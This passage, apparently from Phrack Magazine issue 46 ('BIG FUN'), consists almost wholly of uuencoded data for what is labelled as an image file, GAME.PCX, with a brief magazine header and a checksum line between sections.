MCPX^!\'GP<</P?\,'\3_PL_.____]/_![\'_P<_#_\'^!];_#]/_C\/_#\'O;
M#X^'P?\'P>?!Y@_!_P8??\'_?\'_P<<'SO____O_#]7_P?P#U_^_P?^_C\'G>
MP?^/P?_!_!_!_P<<?\'\?\'_P?`/SO______TO_!_`':_\'/RO_!_<+_P?@O#
MSO______[O_!S]W______^W_P?Y_W?_________-_________\W_T/\_Q__!3
MS______S_]#_/\?_P<______\__/_\'^/\?_P<_!_\']R/_!_G_!_\']SO^?O
M_____];_S__!_'_'_\'OP?_!^<C_P?S!_\'YP?C,_\'^?[W_____UO_._\'@G
MP?QX9\'PP?_!X\+_P?#!Y\'QP?#$_\']P__!^,'_P?C!_<S_P?Y^?,/_P?'![
M_\'GPO_!^<7_P?[!]______&_\[_P>!\>&/!\'[!X<+_P?!OPO#!_L/_P?C#A
M_\'XP?_!\,W_P?["?,/_P?'!_\'WPO_!^<7_P?[!]\7_P?[_____SO\#'#AAW
MP<`<`,+_P>`'`'!X`\+_P<!\`<'\`'_!\'C!\`!?P?#"_\'#P?A_P?C!_\'X`
MP?_!_'_#_\'SP?_!Y\+_P?G%_\'XP>/![\'_P?S"_\'\?____O_._P\>.$.&R
M'AK"_\'"#P80?`/"_X(>`<'^`'_!\#[!\@(/P<)_P?\#P?(/P?X?P<9_P?X?/
MP?^?P?^7P?^/PO_!^\7_P?[!Y\'?P?_!_L+_P?Y____^_\[_#XX_AP^>/G_!1
M_\*/'AQ]P?O"_X\.#'P,?\'\/&`"!XX?P?X,P>`#P<(/AAX\#C\'P?P'P?^&U
M'X?!_\'^#\*_P?_!_<'GP?_!S\'\?\'_GC_+_\'/RO_!Y___Y__._P^//X</0
MGAY_P?_"CYX?POO"_X\.'G]^?\'_P?[!XX.'CQ_!_@_!X@/!QP>''CX./@?!.
M]@?!_X8/A\'_P?X/GQ]_P?_!YX^'P?X_P?^.?X_!_Y_(_X_*_\'GQO\____@%
M_\[_#XX\`1_!_`!_P?\/P<^`&,'@`<+_P?X,?''!_'_"_,'SP>/!YQ^?P?X_O
MP?'!\,+''Y["/L(\8\''P?_"APP\P?`'CAY_P?'!YX\`,#_!_@!^`<'\!\'/1
MP>^`!'^/P?^_C\C_P?S%_\'SPO\____@_\[_O\',>`&_P?@`PO^/P>_!X#C!_
MX`#"_\'@/,'X<<'XP?_!\,'XP?'!X<'B'Y_!_#_!\<'PP</!XC_!_L)\>,'X[
MPN'!_\'!P>8X>,+AP<X\?\'QP>&/`'!_P?@`?`#!\`/!Y\'C@"!_`<'P/X/!C
M\,+_P>'$_\'XQ?_!\<+_/___X/_/_\'$<,'QO\'XP?'"_\'?P>8`>,'PP?'"@
M_\'`.,'X<<'XP?_"\,+SP>(`'\'^`,'QP?#!P$)_P?["?'#!\&/!\<'_P<?!K
MX'APP>/!\<',','_P?'!X<'./'#!_\'XP?!XPG#!\,'#P>/!P`!\8,'P1\'!V
MP>!_P?Q`P?A_P?[!P,'P8<'SP?!_P>'!\,'X___B_\__P>QPP?'!_\'XP?O#N
M_\'N<'C!\,'QPO_!X#C!^''!^,'_PO#"\\'B('_!_F#!\<'PP<!@?\'\PGS"U
M<&/!\<'_P>?!X,)PP>/!\<'L.,'_P?'!X<'L/,'XP?_"^,)X<,'PPN/!\#!X<
M<,'PPF/!X'_!_'#!\'_!_&#!\&'!\\'@?F#"\'___^'_SO^#'#'!X8>8?,+_!
MP<_!QCPXP?'!^<+_'QQX<<'X?\+XPO/!XQG"_\'PP?'!^,'`?G_!_GY\<`#!5
MP\'SP?_!S\'@`##!P\'QP<08P?_!X<'CP<\!P?C!_\'YP?QPP?YSP?O!Q\'CO
MPI\8P?ACP>/"S\'_P?C">'_!_,)X<<'CP<`>$,'@P?!#P<Y____?_\[_!AXPN
M`8\>/L+_CPX>&,'SP_\?''YQP?Q_POC"\\'G'\+_P?QSP?B/GA_!WCY^.`_!^
MQ\'WP?^/P<8`.,'/P?/!S@S!_\'CP>>/`L'XP?_!^<'^><'^`\'_P<_!Q\(?;
M&,'\9\''CP_!_\'\?GA_P?Q^/'W!QX>>'G/!\X>/?___W__._P8_/`&$'@?!$
MY\'_P<8/`!P\!\'/P?\.#'X\"'_"_,/G#Q_!_CXCP?'"SQ\.PCX\P?_!Q\'W(
MP?^/P<8?P?S!S\'CP<0-P?_"YX_!Q#S!_\'YP?XYP?X#P?^/P<?"'QP`9\''F
MCX?!_\']P?X]P?_!_,'_/<'\9X^./WO!\\'_C___X/_._P<_/@?!QA\'P>?!M
M_\'&#P8>/@?!S\'_!@Y^/@)_PO[#YP\?P?X>`X/"QP\.PS[!_P?!Q\'_CX8?Q
MP?_!Q\'CP<6#P?_!Y\''C\'./\+_P?X[P?X'P?^/P<?"'QX&9\''CX<_PO\_H
MP?_!_L'_/\'^1P\.?\'WP>.?C___X/_._P_"_[_"_X_!\\+_OX^_?@_!Q\'_=
M@`S!_GX`?\'\/,+WP>>`'\'^`,'P`\'@!X0>/GP\','CA\'_AX8>.,''P</!#
MX<'!P?_!X\'GCS\\P?_!^<'^.<'^(\'_PL?"'Q@/P>?!QX_!_!_!^<'^.<'_,
MP?S!_SS!_&>`#'_!\\'T#X___^#_SO^_QO_!\\'_P?W%_\'GP?_!X<'MPOP@X
MP?_!^'C"\\'WP>!_P?X`P?`!P>`'P<##?'@@P?!#P?^!AC!PP>'!X\+AP?_!\
MX<'CCGPXP?_"^'G!_''!\<''P>._/SC!_\+CP<_!^#_!^<'^><'_P?C!_SC!`
M_,'C@#C!_\'QP?@CP<___^#_U?_!\\?_P>?,_\'XPO_!\\'PP?_!\,'_P?#"F
M_L+\0<'P8\'_P>!_P>#"\$/!\<'AP?_!\<'CP<XP>,'_P?AP>'#"\,'AP</!K
M_[^XP?C!\\'CP<_!_X_!^,'\>,'_P?C!_'C!_,'AP=O!^,'^P?'!_\'CP<__G
M_^#_U?_!\]3_P?G#_\'QP?_!_,'_P?C"_\'^P?_!\<'X<\'_P?!_P>#!^,'P$
M?\'QP>'!_\'QP>/!_F!X?\'X<'APP?!AP>#!P\)^>,'XP?/!X\'OP?]_POAX1
MP?_!^,'\>,'XP>/!_\'XP?S!\<'_P?/![___X/_N_\'QU?_!\<+_P<#!_'_!(
M_@!^`<'X`\'@`\'?/SP!P?/!X\'#P<`_P?QP>,'_P?S"<'C!X\''G'AQPO/!U
MS___X/_N_\'SU?_!^<+_P<_!_W_!_P_!_P?!_P_!\`^?'QX#P>?!Q\'#@!_!2
M_@#!^<'_P?X`>!/!QX<>',+SP<./___@____Q?_!_G_/_X_"_\+/?\'_#\/_N
M!\'^!\'GP<0?!\'\?`^//___W____\;_?\__P=_&_X_#_X_!_P_"YQ^'PO["_
M#S___]_____D_\'GQ?^_'___X/___^3_P>/&_S___^#____D_\'C___G____5
MY/_!]\;_?___X/_________-_________\W_________S?_________-____U
sum -r/size 20457/59873 section (from "begin" to last encoded line)
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 7 of 28
****************************************************************************
BIG FUN
(cont)
section 2 of uuencode 4.13 of file GAME.PCX by R.E.M.
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_________\W_________S?_________-_________\W_____R
M____S?_________-_________\W_________S?_________-_________\W_R
M________S?_________-_________\W_________S?_________-________]
M_\W_________S?_________-_________\W_________S?_________-____R
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W_________S?_________-_________\W_________S?______D
M___-_________\W_________S?_________-_________\W_________S?__R
M_______-_________\W_________S?_________-_________\W_________>
MS?_________-_\W_P?S!\<'SP?_!^______Z_\W_P?QPP?#!^,'PP?G!^,'[5
M___)_\']___M_\W_P?S"0,L`0&!QPOO_____[/_._Q^.P@;"`L0``L(``@`"/
M!@<>#AX.'A^?O\'?P?_!W______A_]3_O\'_G\'_P=_%#PX&PP[#!@0&#L,&\
M!\(&#@<.!L</'Y\?G______._]G_P=_"_\'?PH_&#\,'!L('!@?(!@<&!P;#0
M!\,/PH^?C______)_^[_OX^?P?^_G\0/!@0`!L(`!,0`!``$P@8$!L('G\*_8
M___\__C_P?W!\<'PP?W!\,'@8,'@QR``(,,`PB!@P>'!\<'APOG___?_SO_!_
M\\3_P?'R_\'QQO#$8$#$8,'@P?#!X,;PP_'!^?__Z/_-_\'\<<'_P?G!_'?!\
M\/C_P?C#\,)P8'#+8,-PQ/#!^,+YP?C!^<+_P?W__]W_S?_!_&'!_\+X0X#^W
M_\+[P?G!\,'[P?#!X,'PPF##0,D`0,(`0&#!P$!@<<'QP?#!^<'[___6_\W_B
MP?[!\Y_"^`<?___'_\'?P?_#WY_"'\(.P@;"`LD`Q`('!@?"#Q___]#_S?_![
M_G\?P>Q_P?\?___4_\*/Q`_##L0&Q03$!@[&#Q_"#\(?#\*?PO_!W_O_S?_!8
M_K<?P>=GP?\?___9_X_!W\./Q`_$!\(&!\(&!P8'Q`;#!P;#!\</PH_"_\'/(
M\O_-_\'\!S_!YG/!_P?__^?_O\+_G\(/CP8.PP3"``8$RP#"!``//P\?GQ^?`
MP?^/Z?_-_\'\`[_!X''!_X'___#_P?W!Y<'YPO'!_\+QP?##X&#%(,0`QB!@K
MPB!QP>#!^<'PP?'"_\+]W__-_\'\PO_!X''!^\'S_____\+_P?G!\,'_P?')!
M\,'@Q6#"0&!`Q&!PQO#"^=+_S?_!_,+_P>!PP?'_____T?_!_<'YP?W!^<'X)
MPO#"<,'P<,9@<,1@PG#!\,'SSO_-_\'\P?\_P<!PP?$______];_P?O!^<'[,
MP?C!\,'SP?!@PD``8$#&``/._\W_P?[!_P(?G@<&?___\/_!S\'_'\+_'Y_N,
M_Y\?#\[_S_\&'YX/!G____#_P<_!_@_!_\'F'P_$_Q_!_P_X_\__P=_"_Y^/<
M___Q_\'/P?X'P>_!YAX/P?_"'SX/P?X/P>?!]\'''_3______\;_P<_!_:?!&
MX<'\/#_!_\(?.`?!_`S!X\'SP<0_]/______QO_![\'YP?'!X,+\PO\?#WG!0
MY\'\?,+AP>?U_______'_\'YP?'!X,'\P?C!_\'^7H;!\<'SP?Y\P?'!X?;_V
M_____\?_POC!X,'\P?A_P?S!]C!YP?'!_GS!\,'@P?#U_______'_\+YP>#!C
M_,'X#\'\P<<P><'SP?]\P>#!P<'`?_3______\;_P<_!_<'Y@'[!_!_!_@<8C
M.\+_/D0#P<)_]/______QO^/P?W!_X`^PO_!_`<<.\'OP?\^#@^/?_3_____8
M_\;_C\'_AX\_P?^?P?X''A_!Q\'_/@8/C_7______\;_P=_!_`>?/L'\G\']P
MP><^.8?!_S[![A./]?______Q__!^"?!_\']P?PCP?G!\<'^>"?!_WS!]SG!R
MX/7______\?_P?S#_\'\P?/"^\'^P?A_P?_!_,'_P?G!X'_T_______6_\'X5
M]?_________-_______&_\'?___&_______&_X___\;______\;_P<___\;_\
M_____\;_P=___\;_________S?_________-_________\W_________S?__P
M____QO_!W___QO______QO_!W___QO______QO_!S___QO______QO_!W___6
MQO_________-_________\W_________S?_________-_______&_\'?___&^
M_______&_Y___\;______\;_C___QO______QO_!W___QO_________-____)
M_____\W_________S?_________-_______&_\'?___&_______&_X___\;_G
M_____\;_G___QO______QO_!W___QO_________-_________\W_________H
MS?______QO_!W___QO______QO^?___&_______&_Y___\;______\;_G___Y
MQO______QO^?___&_________\W_________S?_________-_______&_\'?Q
M___&_______&_Y___\;______\;_G___QO______QO^?___&_______&_Y__1
M_\;_________S?_________-_________\W______\;_P=___\;______\;_.
MG___QO______QO^?___&_______&_Y___\;______\;_G___QO_________-A
M_________\W_________S?______QO_!W___QO______QO^?___&_______&:
M_Y___\;______\;_G___QO______QO^?___&_________\W_________S?__+
M_______-_______&_\'?___&_______&_Y___\;______\;_G___QO______"
MQO^?___&_______&_Y___\;_________S?_________-_________\W_____]
M_\;_P=___\;______\;_G___QO______QO^?___&_______&_Y___\;_____*
M_\;_G___QO_________-_________\W_________S?______QO_!W___QO__\
M____QO^?___&_\[_P@\?G___\_^?___&_\[_#P?##\*/OY^____M_Y___\;_7
MS?_!_@;"!`##!,,`Q00&PP^/Q+___]__G___QO_-_\']P>'!\<'PQ6#,(&#"#
MX,'QPOG#\<+_POW_____W?_;_\'YP?O!\<?PQ.#!\,'@RF#"X,-@P^##\,'Q]
MP?#!^,'QP?#!\?_____&_]O_P?W#_\']P?C!_,+XP_#!\<'PP?C"\'#!\,5P!
MPF!PQV#$<,;PP?C!_\']_____\+_^/_!^\'YPOC!\<'YP_!@Q4#%`,5`8,'P6
MP?G___?__/_!W\+_PM^?PA\>#L(&`@##`@`"`,,"!A^?P=\?G^O_G___QO__<
M_\S_P=_"_Y^_GQ\/#@;##L4&!\</PA^?P?^_VO^?___&____T_^_C\0/Q`<&!
M!\(&!P;#!\4/C\+?O];_G___QO___]__O\'_OY\/'X8$#L0`!``$P@8'P@_"(
MG\._S/^?___&____Y?_!_<'YP?S#8,L@Q&##\<'YP?W__\W____P_\+PP?'![
M^<7PP>#"8$!@0,9@`,)@<,+@QO#!^<'PP?'!^_;____T_\'YP_C#\,1PS&#"Y
M<&#$<,3PPOC!\,'XP?GP_______#_\/[P?_!^\/YP?O!^,'P<,'@PF!``$#*-
M`,)`PV#!\,/YY/______T/_"WY["'P[#!@(&S0(&PP\?G\+_P=_;_______?>
M_\.?'\0/#LH&R0\?G\_______^;_CY_%#\8'!L@'#Q_._______S_\./!\(&:
MP@3"``_._______Y_\']P?G!X<'PS__________-_________\W_________\
MS?_________-_________\W_________S?_________-_________\W_SO_#:
M\/_____[_\[_P?!@<'______^O_._\'@P?#!X$?_____^O_._\'/PM^'____Q
M__K_SO_!S\+_P>______^O_._\'/PO_!Y______Z_\[_P<_"_\'G______K_Q
MSO_![\+_P>?_____^O_._\'OPO_!X______Z_]'_P?/$_\']______7_SO_!6
M[\+_P>?$_\'\?______T_\[_P<_"_\'GPO_!S\'ZP?X#P?[!_Q_!_\'WP?\&&
M'XX/P?_!_@_!_Q______Y?_._\'/PO_![\+_P<_!]L'\!\+_'\'_P<?!_P0?&
M!@_!_\'^!\'^#\'_/\/_C\3_/P_!_\'?O______6_\[_P<_"_\'GPO_"Y\''?
MCC_!_Q_!_X?!_\(/!P_!_\''!\'^!C\/PN?!_X?!_A_!Q\'_'@8?A@>'#___V
M___4_\[_P<_"_\'GPO_"X\'#P?PXP?\?P?^#P?X?P@\?P?_!P8'!\`0^'\'AP
MP>#!_X?!_#_!P\'^/@`?@`>`!\S_P>______Q__._\'OPO_!Y\+_P?#"X\'\V
M>,'_O\'_P>#!_#_!YP_"_\'CP?C!X<'\/`_!X<'@P?^'P?`_P>#!_SQ]CX#!+
M_\'`P>'!_\'QRO_!X\+_P>?_____Q/_._\'OPO_!Y\+_P?#"X\'\<,/_P<#!_
M_'_!X\/_P<?!^,'AP?P\'\'AP?#!_X?!\#_!X,'^>'_!Y\''P?_!P\'QP?_!H
M\<K_P?/!]\'_P>?1_\'S___Q_]'_P??"_\'X;\'OP?YXP__!\,'\?\'CQ?_!)
MX\'_?"_!X,'P?B?!\#_!X'QX?\'GPO_![\'PP?_!\,'XPO_!^,'_P?O%_\'GE
MT__!\\+_P??$_\'WP?_!_,'YQ/_!^___X?_._\'OPO_!Y\+_P?@/P<_!_SC!(
M_W_!_YC!_C_!SPO"_Y_!_\'#P?\<#\'!P?!^!\'P#\'@?#Q_P>>/P?_!S\'P=
MP?_!X,'X?\'_P>!_P>'!_<'XP?O"_\''R_\?Q__!P\+_P<?$_P_!_\'\P?G$"
M_\'S___A_\[_P<_"_\'GPO_!_A_!S\'_&,'_'\'_'CX"#P(?P?\?P?_!Q\'_]
M#@>!P>`>!\'SC\'"PAY_P>>/P?_!S\'\P?_!P,'X!\'_@!\`P?S"``?!QX?!I
M_\'/DC\'P?X'P?X/P?X?#\'_P=_%_\'/P?_"C\3_'\'_P?YYQ/_!]___X?_.U
M_\'/PO_![\+_P?X?C\'_&<'_'\'_'CX$#P`/P?\/P?_!S\'_#@>!P>(>!\'WD
M#\'''CX_P>>''X_!_,'_P</!YP?!_X</#'S"``>'!\'_CP`_!\'\!\'^#\',%
M'P^?C\'_C\+_/X_!_\*/Q/\?P?_!_F_1_\'/___4_\[_P<_"_\'GP_\?C\'_8
M'\'_'\'_#C[##Q_!_P_!_\''P?\.!PO!YQY'P<>/P<>/'C_!QX8/P<_!_L'_O
MP??"Y\'_AX\>/C]KP>_!QX?!_X\'#PY^#G\'P<</!Q\&?@?!_\'V#P?!_\*'!
M'\'/PO\/P<_!_GO1_\''RO^_/\__O_?_SO_!S\+_P>?#_S_!S\'_.,'_/\'^3
M`#[##\+_'\'_P<?!_PXC&<'C'&?!QX?!QXX^?\'G@`_!S\'\P?_!]\'GP?'!2
M_X_!SCXPP_G!QX_!_X\/'CQ\''&#A\(/'@1X`\'_P?`/!\'_AX`?@'_!_`^%-
MP?QQP?\_S__![\C_O\'_PC_/_S_W_\[_P>_"_\'GP_\_P>/!_#C!_C_!_``\X
M/\'/O\+_C\'\P>/!_PQP.<'AB,'CP<`#P>/!X#Q_P>.'P?_!S\'XP?_!\<'G=
MP?'!_\'GP>`@,,/YP>/!Y\'_P<._/#W!^,'\8<'QP<?![[^<?'C!\<'_P>'!]
MX\'#P?_!P\'`AX`_P?P/`'AQP>`/PGS!\\'@?\'@PO_!X<__?\'_PC_$_\'QC
MRO\_P?_!_G_-_\'QYO_1_\'WPO_!_G_!X\'X>,'^?\'X8#Q_P>_#_\'7P?C!I
MX\'_/'!YP?'!P,'CP<`#P>/!X#A_P>/!W\'_P<?!^,'_P?/!Y\'QPO_!X`!PV
MP_'!X\+_P</!_\'\<<'XP?Q@P?'!S\+_P?C!_G#!\,'_P>/!\\''P?_!Y\'!1
MP>>P?\'\/G!XP?'!X,''PGS!\\'`/\'@?\'^8,'XP>S!X\+PPO?!\,'_P?/#P
M_\'XP?Y_P?_"?\3_P?'*_W_!_,'^S?_!Y\'AP>?"_\'^P?_!^>#_SO_!\,'Y9
MP?_!]\+_P?Y_PO#!^'A_P?A_?'_!Y\/_P>/!^,'QP?Q\<'C!\<'@P>/!X''!`
MX\'P/'_!X\+_P>?!^,'_P?'!Y\'YPO_!X'#!^,'YP?C!^<'CPO_!X\'_P?Y@M
MP?C!_L)@P__!^,'^>,'XP?_!Y\'QP>_!_\'WP>?!YG_"_SQ^>''"X<)XP?'![
MX,'WP>`_P?XPP?AX<,'P8&'!X\'@?\'@P?AWP?_!\'@_P?P^<,'^P?/!_\'XK
MP?'!^'Y[P?#"_\'WP?S!_\'X?\'\?\W_P?/!X</_P?Q_P?C@_\[_P<!@<<'GC
MPO_!_C_!\&#!^'!_P?A_#'_!QP_"_\'!P?#!\<'\/'!YP?'!P<'CC\'SP>/!L
M\#Q_P<>/P?_!Q\'PP?_!\\'GP?'!_\'/P<1_P?C#^<'CP<_!_\'#/Q_!P'C!Y
M_F`!P<_!_\'?&,'^.<'XP?_!S\'SP<_!_\+'P>8?/\'_'G\8<<''P>'".,'SM
MP</!QYX?P?XX<'APP>!`0<'CP<`^`,'P!\'_P>`8#\'\#P!^`<'_P?@!P?`<<
M`\'@P?_!_@/!\'_!X#_!^'_!_\'[S/_!P\/_P?Q_P?##_Y_<_\[_P<X&`@_#E
M_S_!_@/!_@!_P?[!_XX_P<<"#\'_P<`#P?@8/CQ[P>/!P\'GC\'SP<?!_,(>*
M#X_!_\''P=/!_\'SP>?!\\'_P<?!SC_!_,'_P?G!^\''C\'_P<<?#\'^?,'^T
M(\'?C\'_GQY_&<'XP?_!S\'SP<_!_\''C\'&`A_!_QY_'GF/P>/"','SPH\?$
MG\'^/SA\P?S!X\'AP?/!QX_"'G"'P?_!QPX?P?\/!CX#P?_!\`/!X@8'@C_![
M_@/!P`\`'\'\'GX"!\'^'\'_P?(_CW^/P?\?P?_!Q\/_P?Y_P?K#_Y_<_\__5
MP@\?P_\_P?\/P?\'P_^//\'/``_!_\'N!\'^`GX\?\'GP<?!YP_!_\''P?X^7
M#A^'#X<'P?_!]\'GP<?!_X>/'S_#_\''C\'_P<\?#\'^/'XGP?^/P<\/'G\?3
MP?W!_X_!]X_!_\*/P<8&'\'_'G\>>X_!XPP?P<?"CQ^?P?X_','\/&?!X\'OH
MP<>/'CXSPO_!SX\?P?\?#SP-P?_!XP?!QX?"#Q_!_@F'#PP?P?P>?``'P?0/D
MP?_!Q!\&'P?!_@_!SP?!S\''P?\.?\'_C\+_']S_U_^?P?_!S\/_P=_!_\'/-
MCP_"_P_!_P?$_\'GP>^?P?_!Q\'_/@<?@@>&#\'_P??!YP_!_X</#G_#_\'G-
MA\'_P<<?#Q["/F?!_\*/#QX_'\+_P<_!YX_!_\*/P<<?PO\?/QY[C\'GC@/!B
MQ\*/'Y_!_S\>P?P&9\'GP>_!QX?!_@XW'\+_CQ_!_\,?P?]_P<?!Y\'_AX\/<
M'\+_AX_"'\'^'CX"#\''!\'_AP\&'P=^!\''!\'/AC\&/\'^!\'_#X^'V__D7
M_[_!_[_*_SX%P?^`!\'`#\'_P?#!^`_!_X`?`,+]P?G!_\'GP<?!_\'''PX,-
M?!QQ@\''CP\>/CG!_<'_PL>/P?_"C\''/\+_'C\<<8_!XX`#P>>/CA^?P?Y_[
M','P`,'GP?/!\<'G@+P$-`_"_P\_P?_"/SC!_'_!Q\'CP?^''P\?P?_!^8>.*
MPC_!_C[">,'YP>?!Q\'_C\(/'AQX`\''A\''!#X`?\'\`\'T#Q\`P?_!Y\'OT
MV/_T_\']P?_!_<+_P?G!_,+_P>#!_\'APOW#_\'CP?_!Y\+_`,'X`,'X`\'@Q
M+\'''B#"^<'_P>'!X\'OP?_!Y\''P>>_PO\_/CAQP>?!X<+!P?/!S\'F/Y_!/
M_G\XP?#!\<'APO'!X\'P.`!X`\'_P>`'?\'_/W\P('_!Y\'QP?`#O``_P?[!W
MX,'GP>Q_/\'\?'C"^,'AP>/!_\'#P?X_B'AQP?'"X\'B/SAX?\'P<,'@P>.<(
M,'G!X<'CV/_]_\'CQ__!\\3_P>#!^&'!^&/!\'_!X\'^P>#"^<'_P?!'P>_!?
M_\/GP?!_P?]_?'C!\<'AP>/"P<'SP<_!YL'_P=_!_GYXP?#!^\/QP>/!_#C!F
M\,']P>'!_\'@!G_!_\)_<$#!_\'CP?'!\$/!_`!_P?@`P>?!Y,'_?\'\PGC"@
M^,'@P>'!_\'@P?Y_P<!P<<'QP>/!Y\'B?L+X?\'PP?C!X<'CP?S">,'AP>/8U
M____R__!^<'XP?O"_\'XP__!\<+YP?_!\'_"_\'SP?_!]\'@?\'_?\'P>''!B
M\,'GP>'!X\'SP>_!Y\'^O\'^?'C!\,'XP_'!X\'_P?C!_\'[P?'!_\'@P>9_#
MP?_"?W#!\<'_P>/!\<'@P>/!_##!_\'X<,'GP>S!_W_!_'QXPOC!X&'!_\'P[
M?G_!X'!SP?_!X\'GP>+",,'\?\+XP>'!\<'X?GC!X-G__?_!S\W_P?C+_\'\^
MP__!]\+_P>##_\'`P?C!\<'P!\+#P?/!S\''@!_!_CAXPOC!X\+QP>.?G,'^S
MP?/!\<'_AXY_P?\_?S#"_\'CP?'"P\'^/\'_POC![\',?S_!_'QYPOC!P'/!'
M_\'P/C^``&/!_\'#P<_!Q@`0P?Q_P?C!_$#!XYA^.,'@P<_8__W_P=_-_\'^D
MUO_!W\+_P?X?P<?!S\'WPL^"'\'^`'S!_`+!Y\+SP<>/PAYSP?/!_X\/'\'_=
M'S\<PO_!Q\'SA\'#GQ^_P?W!^,'/P<["/\'^/GG!^<'XP<?#_PX?@!_!Y\'_;
MP<?!S\'.`AG!_G_!_,'^``,>?QX`P<_8____Y_\_P__"WX8?P?X'P?_!_@?!E
M[\+_P<>.'@Q_!\'_A@\?P?\?/SP?P?_!QX>/!\(/'\']:<*//C_!_CY_POW!<
MS\+_P=\/'XP_P>?!_\+/C@\=P?Y_P?_!_@(/'G\>!0_8____[?_"G\'_'\+_G
MC\/_P>_!SS\'P?\/P?_!Q@</P?\//SX'P?_![@?!Q@>/AC_!_@</CPX_P?\>M
M?\+_P<>'P?^/P@\.'R?"Q\'/CQ^?P?Y_P?_!_@>?#G\>#@_8____[?^?'\'^%
M/]'_P=_"_X_!_\'^'\'_/\'?P>3!_\'^#\'_P<^`/\'_'GW"_<'P!\'_P<8/"
M!!X`>`/!Q\+/#QQ\?\+\1\'WGCX>#A_8____[?^`?\'^?];_P?W$_\'YQ?_!7
MX<+_P?[#^<'P+\'_P>`^`'X`P?@#P>/!Y\'O@#AP?\+PP>'!X[S"?!P_V/__I
M_^W_P>#K_\'\PO_!\,'^,,'_P?'!^'?!]\+_P>#!_D#!_\'P8,'PP>/!_L'`,
M?L)\V/___^W_P?#O_\'^?<+_P?S$_\'PP?[!\,'_P?AAP?!_P?[!X,'^PGQ_8
MU_______WO_!_G_0_\'SV__._\/?_____\W_P?X?[/_-_\'NQ@;##L8/PO^?#
M___^_S_L_\W_P>\/!\@&!\(&P@?%#\2/O______E_]3_GX\_P?_"CQ\/C,($$
M`,,$``3%`,($!L($Q08'#Y^/G[_!_[_!_[______SO_<_\'YP?'!X<'@P>'!>
MX,)@P>!@T2!@(&'!X,)@<</QP?G!_\']_____\C_Z/_!^</_P?G!_\/YQ_#!L
MX,'P8,'PP>!@P>#)8,+@R/#!\<'S___W__3_P?G#^,'PP?C!\,'XQ/!PP?#%%
M<,9@<,)@PG#!\'#"\,'XP?G!^___\O_-_\'X^O_!^\/YP?'!^,+P8,-`Q0#"!
M0&#"0,-@<,'QP_O__^7_S?_!_A^?___!W\*?'Q[&`@#'`L(&#@_!W___Y/_-E
M_\'^#@_!QC_!_\'/#X8^'___PO_!WY_!_\*?PA_"#\,.Q08.QP\?/Y___];_Z
MSO\'#\''9\'_P<X'AR<?___+_\*/P@_$!P;&!P\'Q`_"C\+?O___S__._\'FI
M?L'/P?'!X<'.?X_!YY___]3_PH^?PH_"!\(&P@3$``0`Q`3"!@</#@</'P\'@
M#[^?OY^_^O_-_\'QP>#!_,'OP?#!X<'L>\'_P>/__]S_P?G!\<'XPN#"(`##"
M(,<`(,(`PB#"`,(@8"#"8,'PP?'!^<+]]/_-_\'PP>!@P>#!\,'@P>9WP<'!V
M\/__Y?_"^<?P8,+PP>#!\,'@P?#"8,'@8,'@8,)`8$#&8,+@Q/#!^<']Y__-<
M_\'P?&#!X'#!X,'^<\'@P?#__^O_P?O!^,'ZP?C!^<3XPO#!^,7PPW#*8,-P-
MQ?#"^,+YW__-_\'PP?QXP>/!\$#![\'AP<#!^!______PO_$^\'XP?#"^,+P-
M<,D`PD!@P>#!\,'YP?'!^\'_P?O4_\W_P?O!_C[!S\'V"<'/P<./P?\/___M?
M_[_9_\'?PO_"WPX&#@;$`L,`PP(&`@8/PA\/'Y_!W\__S_\^P<_!_P_!SW^?B
MP>^/___M_[_F_Y_$#\0.QP8/SO_/_S_!S\'G#\'/%X_!SX___^W_O\/_P<_C8
M_Y_"_Y_$C\0/P@<&#\[_T/_!P#^?P<X'A"0/___M_[_!Y#_!_X`\#\/_P?X_C
MP?\_^/_0_\'@?\'_P?XCP>!P/___[O_!X#_!Y\'@P?!OP?_!_G[!X#_!X#W!]
M[\'_P>'U_]#_P?O$_\'PP?C__^__P>/"Q\'PP?'!_\'\?GS!\,'_P?!PPN/!S
MP/7______\?_P??"Y\'SP?'!_\'\PGS!\<'_P?C!\,+CP?#U_______'_\+GD
MD\'SP?'!_\'\PA[!\\'GP?S!^,+#O_7______\;_/\'OP<<7P??!\C_!_!X.F
MP??!Q\'^P?O!QX<?]?______QO^_P>_!QQ_!_\'X'\'_C@9OP>?!_L'_P<,'S
M#_7______\;_O\'OAP?"]Q_!_PX&9\''PO^'P@?U_______&_[_!YX8!P??!T
M\\'_P?`.<&?!Y\'^P?F,!Q_U_______'_\'@#'G!\\'QP?_!\<'F>,'QP>?!F
M_,'YP>ASO_7______\?_P>!XP?G!\\'PP?_!\<'D>,'PP?_!_,'PP?AS]O__$
M____Q__!\,/_P?C!_\'SP?;!_,'P?\'\P?G!_,'SP>#U_______'_\'[R/_!U
M^,+_P?O!_L'_P<#U_______&_[___\;______\;_O___QO_________-____Q
M_____\W_________S?_________-_________\W_________S?_________-R
M_________\W______\;_O___QO_________-_________\W_________S?__[
M_______-_________\W______\;_O___QO______QO\____&_______&_[__;
M_\;______\;_?___QO_________-_________\W_________S?_________-=
M_________\W______\;_?___QO______QO\____&_______&_W___\;_____2
M_\;_?___QO_________-_______%_\'^?___QO______QO]____&_______&G
M_S___\;______\;_/___QO______QO]____&_______&_S___\;______\;_P
M?___QO_________-_______%_\'^___'_______&_W___\;______\;_?___W
MQO______QO\____&_______&_S___\;______\;_?___QO______Q?_!_G__W
M_\;_________S?______Q?_!_G___\;______\7_P?Y____&_______&_W__L
M_\;______\;_?___QO______QO]____&_______&_W___\;______\;_?___P
MQO______Q?_!_O__Q_______Q?_!_G___\;______\;_?___QO______QO]_L
M___&_______&_S___\;______\;_/___QO______QO]____&_______&_W__0
M_\;______\7_P?[__\?______\7_P?Y____&_______%_\'^?___QO______/
MQ?_!_G___\;______\;_?___QO______QO]____&_______&_W___\;_____S
M_\7_P?Y_V__!_>G______\7_P?Y_V__!_>G______\7_P?Y_V__!_>G_____D
